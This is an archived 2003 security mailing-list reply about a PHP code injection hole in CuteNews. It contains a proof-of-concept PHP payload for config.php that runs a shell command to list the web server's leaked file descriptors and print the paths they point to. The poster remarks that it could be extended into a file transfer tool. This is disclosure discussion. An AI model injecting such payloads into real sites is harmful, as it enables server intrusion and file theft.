Re: PHP code injection in CuteNews

From: Steve Grubb (linux_4everat_private)
Date: Fri Feb 28 2003 - 14:18:05 PST

Next message: Nicolas RUFF (lists): "Re: Netscape Communicator 4.x sensitive informations in configuration file"

Previous message: Kevin Spett: "Re: The Easiness of Session Fixation"
Maybe in reply to: Over_G: "PHP code injection in CuteNews"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) In-Reply-To: <E18ndJT-000JS2-00at_private> Hello, If the cutenews website is running apache 2.x which leaks descriptors to all kinds of things http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2 Then you can do this: config.php = <html><head><title>File List</title></head> <body> <?php $cmd = "/bin/ls -l /proc/$$/fd"; exec($cmd, $dir_listing, $status); foreach($dir_listing as $item) { $match = preg_split("/> /", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "<br>"; } } } ?> </body></html> it doesn't take alot more to make this a fully clickable file transfer utility that Sandboxes or Jails cannot protect. -Steve Grubb

Next message: Nicolas RUFF (lists): "Re: Netscape Communicator 4.x sensitive informations in configuration file"
Previous message: Kevin Spett: "Re: The Easiness of Session Fixation"
Maybe in reply to: Over_G: "PHP code injection in CuteNews"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Feb 28 2003 - 14:45:03 PST